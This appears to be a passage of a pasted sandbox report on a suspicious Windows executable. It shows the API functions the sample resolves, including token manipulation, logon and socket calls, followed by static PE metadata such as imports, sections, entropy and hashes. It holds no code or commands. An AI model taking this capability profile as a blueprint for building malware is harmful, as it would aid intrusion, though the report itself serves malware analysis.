- "wevtapi.dll.EvtClose",
- "wevtapi.dll.EvtQuery",
- "wevtapi.dll.EvtCreateRenderContext",
- "rpcrt4.dll.RpcBindingSetOption",
- "ole32.dll.CoCreateFreeThreadedMarshaler",
- "ole32.dll.CreateStreamOnHGlobal",
- "advapi32.dll.RegCreateKeyExW",
- "advapi32.dll.RegSetValueExW",
- "cryptsp.dll.CryptAcquireContextW",
- "cryptsp.dll.CryptGenRandom",
- "kernelbase.dll.InitializeAcl",
- "kernelbase.dll.AddAce",
- "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
- "kernel32.dll.IsThreadAFiber",
- "kernel32.dll.OpenProcessToken",
- "kernelbase.dll.GetTokenInformation",
- "kernelbase.dll.DuplicateTokenEx",
- "kernelbase.dll.AdjustTokenPrivileges",
- "kernelbase.dll.AllocateAndInitializeSid",
- "kernelbase.dll.CheckTokenMembership",
- "kernel32.dll.SetThreadToken",
- "oleaut32.dll.#285",
- "advapi32.dll.RegOpenKeyW",
- "oleaut32.dll.#12",
- "oleaut32.dll.#286",
- "ole32.dll.CLSIDFromString",
- "oleaut32.dll.#17",
- "oleaut32.dll.#20",
- "oleaut32.dll.#19",
- "oleaut32.dll.#25",
- "authz.dll.AuthzInitializeContextFromSid",
- "ole32.dll.CoRevertToSelf",
- "advapi32.dll.LogonUserExExW",
- "sspicli.dll.LogonUserExExW",
- "ole32.dll.CoGetCallContext",
- "ole32.dll.CoImpersonateClient",
- "oleaut32.dll.#8",
- "ole32.dll.CoSwitchCallContext",
- "oleaut32.dll.#287",
- "oleaut32.dll.#288",
- "oleaut32.dll.#289",
- "fastprox.dll.DllGetClassObject",
- "fastprox.dll.DllCanUnloadNow",
- "oleaut32.dll.#290",
- "ntdll.dll.RtlInitUnicodeString",
- "ntdll.dll.RtlFreeUnicodeString",
- "ntdll.dll.NtSetSystemEnvironmentValue",
- "ntdll.dll.NtQuerySystemEnvironmentValue",
- "ntdll.dll.NtCreateFile",
- "ntdll.dll.NtQuerySystemInformation",
- "ntdll.dll.NtQueryDirectoryObject",
- "ntdll.dll.NtQueryObject",
- "ntdll.dll.NtOpenDirectoryObject",
- "ntdll.dll.NtQueryInformationProcess",
- "ntdll.dll.NtQueryInformationToken",
- "ntdll.dll.NtOpenFile",
- "ntdll.dll.NtClose",
- "ntdll.dll.NtFsControlFile",
- "ntdll.dll.NtQueryVolumeInformationFile",
- "advapi32.dll.LookupPrivilegeValueW",
- "winbrand.dll.BrandingLoadString",
- "shell32.dll.#66",
- "comctl32.dll.#385",
- "comctl32.dll.#336",
- "comctl32.dll.#321",
- "comctl32.dll.#333",
- "linkinfo.dll.CreateLinkInfoW",
- "user32.dll.IsCharAlphaW",
- "user32.dll.CharPrevW",
- "ntshrui.dll.GetNetResourceFromLocalPathW",
- "srvcli.dll.NetShareEnum",
- "cscapi.dll.CscNetApiGetInterface",
- "slc.dll.SLGetWindowsInformationDWORD",
- "shlwapi.dll.PathRemoveFileSpecW",
- "linkinfo.dll.DestroyLinkInfo",
- "propsys.dll.PropVariantToBoolean",
- "advapi32.dll.RegQueryInfoKeyW",
- "advapi32.dll.RegEnumKeyExW",
- "advapi32.dll.RegEnumValueW",
- "advapi32.dll.RegQueryValueExW",
- "kernel32.dll.QueryActCtxW",
- "shlwapi.dll.UrlIsW",
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.FlsFree",
- "kernel32.dll.InitializeCriticalSectionAndSpinCount",
- "msvcrt.dll._set_error_mode",
- "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
- "kernel32.dll.FindActCtxSectionStringW",
- "kernel32.dll.GetSystemWindowsDirectoryW",
- "mscoree.dll.GetProcessExecutableHeap",
- "mscorwks.dll.DllGetClassObjectInternal",
- "mscorwks.dll.GetCLRFunction",
- "advapi32.dll.RegisterTraceGuidsW",
- "advapi32.dll.UnregisterTraceGuids",
- "advapi32.dll.GetTraceLoggerHandle",
- "advapi32.dll.GetTraceEnableLevel",
- "advapi32.dll.GetTraceEnableFlags",
- "advapi32.dll.TraceEvent",
- "mscoree.dll.IEE",
- "mscorwks.dll.IEE",
- "mscoree.dll.GetStartupFlags",
- "mscoree.dll.GetHostConfigurationFile",
- "mscoree.dll.GetCORSystemDirectory",
- "ntdll.dll.RtlUnwind",
- "kernel32.dll.IsWow64Process",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.OpenProcessToken",
- "advapi32.dll.GetTokenInformation",
- "advapi32.dll.InitializeAcl",
- "advapi32.dll.AddAccessAllowedAce",
- "advapi32.dll.FreeSid",
- "kernel32.dll.SetThreadStackGuarantee",
- "kernel32.dll.AddVectoredContinueHandler",
- "kernel32.dll.RemoveVectoredContinueHandler",
- "advapi32.dll.ConvertSidToStringSidW",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.GetWriteWatch",
- "kernel32.dll.ResetWriteWatch",
- "kernel32.dll.CreateMemoryResourceNotification",
- "kernel32.dll.QueryMemoryResourceNotification",
- "mscoree.dll._CorExeMain",
- "mscoree.dll._CorImageUnloading",
- "mscoree.dll._CorValidateImage",
- "ole32.dll.CoGetContextToken",
- "oleaut32.dll.#149",
- "kernel32.dll.GetUserDefaultUILanguage",
- "kernel32.dll.GetVersionExW",
- "kernel32.dll.GetFullPathNameW",
- "kernel32.dll.SetErrorMode",
- "kernel32.dll.GetFileAttributesExW",
- "version.dll.GetFileVersionInfoSizeW",
- "version.dll.GetFileVersionInfoW",
- "version.dll.VerQueryValueW",
- "kernel32.dll.lstrlen",
- "kernel32.dll.lstrlenW",
- "mscoree.dll.ND_RI2",
- "kernel32.dll.lstrcpy",
- "kernel32.dll.lstrcpyW",
- "version.dll.VerLanguageNameW",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.GetCurrentProcessId",
- "kernel32.dll.GetCurrentProcess",
- "advapi32.dll.AdjustTokenPrivileges",
- "kernel32.dll.OpenProcess",
- "psapi.dll.EnumProcessModules",
- "psapi.dll.GetModuleInformation",
- "psapi.dll.GetModuleBaseNameW",
- "psapi.dll.GetModuleFileNameExW",
- "kernel32.dll.GetExitCodeProcess",
- "user32.dll.EnumWindows",
- "user32.dll.GetWindowThreadProcessId",
- "kernel32.dll.WerSetFlags",
- "kernel32.dll.GetUserDefaultLocaleName",
- "kernel32.dll.GetEnvironmentVariableW",
- "advapi32.dll.CryptAcquireContextA",
- "advapi32.dll.CryptReleaseContext",
- "advapi32.dll.CryptCreateHash",
- "advapi32.dll.CryptDestroyHash",
- "advapi32.dll.CryptHashData",
- "advapi32.dll.CryptGetHashParam",
- "advapi32.dll.CryptImportKey",
- "advapi32.dll.CryptExportKey",
- "advapi32.dll.CryptGenKey",
- "advapi32.dll.CryptGetKeyParam",
- "advapi32.dll.CryptDestroyKey",
- "advapi32.dll.CryptVerifySignatureA",
- "advapi32.dll.CryptSignHashA",
- "advapi32.dll.CryptGetProvParam",
- "advapi32.dll.CryptGetUserKey",
- "advapi32.dll.CryptEnumProvidersA",
- "cryptsp.dll.CryptAcquireContextA",
- "cryptsp.dll.CryptImportKey",
- "cryptsp.dll.CryptExportKey",
- "cryptsp.dll.CryptCreateHash",
- "cryptsp.dll.CryptHashData",
- "cryptsp.dll.CryptGetHashParam",
- "cryptsp.dll.CryptDestroyHash",
- "cryptsp.dll.CryptDestroyKey",
- "mscoree.dll.GetTokenForVTableEntry",
- "mscoree.dll.SetTargetForVTableEntry",
- "mscoree.dll.GetTargetForVTableEntry",
- "culture.dll.ConvertLangIdToCultureName",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.GetConsoleScreenBufferInfo",
- "kernel32.dll.LocalFree",
- "kernel32.dll.LocalAlloc",
- "mscoree.dll.ND_RI4",
- "advapi32.dll.DuplicateTokenEx",
- "advapi32.dll.CheckTokenMembership",
- "kernel32.dll.GetConsoleTitleW",
- "kernel32.dll.SetConsoleTitleW",
- "kernel32.dll.SetConsoleCtrlHandler",
- "kernel32.dll.CreateEventW",
- "ntdll.dll.WinSqmIsOptedIn",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "shfolder.dll.SHGetFolderPathW",
- "kernel32.dll.SetEnvironmentVariableW",
- "kernel32.dll.GetACP",
- "kernel32.dll.UnmapViewOfFile",
- "kernel32.dll.GetFileType",
- "kernel32.dll.ReadFile",
- "kernel32.dll.GetSystemInfo",
- "kernel32.dll.VirtualQuery",
- "kernel32.dll.SwitchToThread",
- "kernel32.dll.GlobalMemoryStatusEx",
- "secur32.dll.GetUserNameExW",
- "advapi32.dll.GetUserNameW",
- "kernel32.dll.ReleaseMutex",
- "advapi32.dll.RegisterEventSourceW",
- "advapi32.dll.DeregisterEventSource",
- "advapi32.dll.ReportEventW",
- "kernel32.dll.GetLogicalDrives",
- "kernel32.dll.GetDriveTypeW",
- "kernel32.dll.GetVolumeInformationW",
- "kernel32.dll.GetCurrentDirectoryW",
- "kernel32.dll.GetLastError",
- "mscorjit.dll.getJit",
- "kernel32.dll.GetStdHandle",
- "kernel32.dll.GetConsoleMode",
- "kernel32.dll.SetEvent",
- "kernel32.dll.GetConsoleOutputCP",
- "gdi32.dll.TranslateCharsetInfo",
- "kernel32.dll.SetConsoleTextAttribute",
- "kernel32.dll.WriteConsoleW",
- "mscoree.dll.CorExitProcess",
- "mscorwks.dll.CorExitProcess",
- "mscorwks.dll._CorDllMain",
- "kernel32.dll.CreateActCtxW",
- "kernel32.dll.AddRefActCtx",
- "kernel32.dll.ReleaseActCtx",
- "kernel32.dll.ActivateActCtx",
- "kernel32.dll.DeactivateActCtx",
- "kernel32.dll.GetCurrentActCtx",
- "linkinfo.dll.IsValidLinkInfo",
- "propsys.dll.PSGetNameFromPropertyKey",
- "propsys.dll.PSStringFromPropertyKey",
- "propsys.dll.InitVariantFromBuffer",
- "propsys.dll.PropVariantToGUID",
- "advapi32.dll.GetSecurityInfo",
- "advapi32.dll.SetSecurityInfo",
- "advapi32.dll.GetSecurityDescriptorControl",
- "kernel32.dll.GetConsoleWindow",
- "user32.dll.ShowWindow",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.GetFileSize",
- "rasapi32.dll.RasEnumConnectionsW",
- "rtutils.dll.TraceRegisterExA",
- "rtutils.dll.TracePrintfExA",
- "sechost.dll.OpenSCManagerW",
- "sechost.dll.OpenServiceW",
- "sechost.dll.QueryServiceStatus",
- "sechost.dll.CloseServiceHandle",
- "ws2_32.dll.WSAStartup",
- "ws2_32.dll.WSASocketW",
- "ws2_32.dll.setsockopt",
- "ws2_32.dll.WSAEventSelect",
- "ws2_32.dll.ioctlsocket",
- "ws2_32.dll.closesocket",
- "kernel32.dll.GetComputerNameW",
- "advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
- "kernel32.dll.CreateFileMappingW",
- "kernel32.dll.MapViewOfFile",
- "advapi32.dll.CreateWellKnownSid",
- "kernel32.dll.CreateMutexW",
- "kernel32.dll.WaitForSingleObject",
- "kernel32.dll.OpenMutexW",
- "kernel32.dll.GetProcessTimes",
- "ws2_32.dll.WSAIoctl",
- "kernel32.dll.FormatMessageW",
- "rasapi32.dll.RasConnectionNotificationW",
- "advapi32.dll.RegOpenCurrentUser",
- "advapi32.dll.RegNotifyChangeKeyValue",
- "winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser",
- "sechost.dll.NotifyServiceStatusChangeA",
- "kernel32.dll.ResetEvent",
- "iphlpapi.dll.GetNetworkParams",
- "dnsapi.dll.DnsQueryConfig",
- "iphlpapi.dll.GetAdaptersAddresses",
- "iphlpapi.dll.GetIpInterfaceEntry",
- "iphlpapi.dll.GetBestInterfaceEx",
- "ws2_32.dll.inet_addr",
- "ws2_32.dll.getaddrinfo",
- "ws2_32.dll.freeaddrinfo",
- "ws2_32.dll.WSAConnect",
- "ws2_32.dll.send",
- "ws2_32.dll.recv",
- "psapi.dll.EmptyWorkingSet",
- "kernel32.dll.ReadConsoleW",
- "ws2_32.dll.shutdown"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "CloseHandle",
- "address": "0x40c000"
- },
- {
- "name": "WaitForSingleObject",
- "address": "0x40c004"
- },
- {
- "name": "Sleep",
- "address": "0x40c008"
- },
- {
- "name": "CreateDirectoryA",
- "address": "0x40c00c"
- },
- {
- "name": "GetTempPathA",
- "address": "0x40c010"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x40c014"
- },
- {
- "name": "GetTickCount",
- "address": "0x40c018"
- },
- {
- "name": "LCMapStringA",
- "address": "0x40c01c"
- },
- {
- "name": "SetEndOfFile",
- "address": "0x40c020"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x40c024"
- },
- {
- "name": "GetOEMCP",
- "address": "0x40c028"
- },
- {
- "name": "GetLastError",
- "address": "0x40c02c"
- },
- {
- "name": "DeleteFileA",
- "address": "0x40c030"
- },
- {
- "name": "ExitProcess",
- "address": "0x40c034"
- },
- {
- "name": "TerminateProcess",
- "address": "0x40c038"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x40c03c"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x40c040"
- },
- {
- "name": "GetStartupInfoA",
- "address": "0x40c044"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x40c048"
- },
- {
- "name": "GetVersion",
- "address": "0x40c04c"
- },
- {
- "name": "HeapFree",
- "address": "0x40c050"
- },
- {
- "name": "SetFilePointer",
- "address": "0x40c054"
- },
- {
- "name": "SetHandleCount",
- "address": "0x40c058"
- },
- {
- "name": "GetStdHandle",
- "address": "0x40c05c"
- },
- {
- "name": "GetFileType",
- "address": "0x40c060"
- },
- {
- "name": "WriteFile",
- "address": "0x40c064"
- },
- {
- "name": "ReadFile",
- "address": "0x40c068"
- },
- {
- "name": "GetProcAddress",
- "address": "0x40c06c"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x40c070"
- },
- {
- "name": "FreeEnvironmentStringsA",
- "address": "0x40c074"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x40c078"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x40c07c"
- },
- {
- "name": "GetEnvironmentStrings",
- "address": "0x40c080"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x40c084"
- },
- {
- "name": "HeapDestroy",
- "address": "0x40c088"
- },
- {
- "name": "HeapCreate",
- "address": "0x40c08c"
- },
- {
- "name": "VirtualFree",
- "address": "0x40c090"
- },
- {
- "name": "RtlUnwind",
- "address": "0x40c094"
- },
- {
- "name": "HeapAlloc",
- "address": "0x40c098"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x40c09c"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x40c0a0"
- },
- {
- "name": "SetStdHandle",
- "address": "0x40c0a4"
- },
- {
- "name": "FlushFileBuffers",
- "address": "0x40c0a8"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x40c0ac"
- },
- {
- "name": "GetStringTypeA",
- "address": "0x40c0b0"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x40c0b4"
- },
- {
- "name": "CreateFileA",
- "address": "0x40c0b8"
- },
- {
- "name": "GetCPInfo",
- "address": "0x40c0bc"
- },
- {
- "name": "GetACP",
- "address": "0x40c0c0"
- },
- {
- "name": "LCMapStringW",
- "address": "0x40c0c4"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "ShellExecuteExA",
- "address": "0x40c0cc"
- }
- ],
- "dll": "SHELL32.dll"
- },
- {
- "imports": [
- {
- "name": "timeGetTime",
- "address": "0x40c0d4"
- }
- ],
- "dll": "WINMM.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0001da2c",
- "overlay": {
- "size": "0x000001de",
- "offset": "0x0000f000"
- },
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x00406074",
- "timestamp": "2014-08-02 23:47:05",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x0000b000",
- "entropy": "6.29",
- "raw_address": "0x00001000",
- "virtual_size": "0x0000a6ea",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0000c000",
- "size_of_data": "0x00001000",
- "entropy": "3.83",
- "raw_address": "0x0000c000",
- "virtual_size": "0x000009e6",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0000d000",
- "size_of_data": "0x00001000",
- "entropy": "3.55",
- "raw_address": "0x0000d000",
- "virtual_size": "0x00b00cf8",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00b0e000",
- "size_of_data": "0x00001000",
- "entropy": "0.00",
- "raw_address": "0x0000e000",
- "virtual_size": "0x00000010",
- "characteristics_raw": "0x40000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0000c528",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x00000050"
- },
- {
- "virtual_address": "0x00b0e000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000010"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0000c000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x000000dc"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "a04f32913d3ef18e07d2c1e3f373c264",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 3,
- "versioninfo": []
- }
- }
Add Comment
Please, Sign In to add comment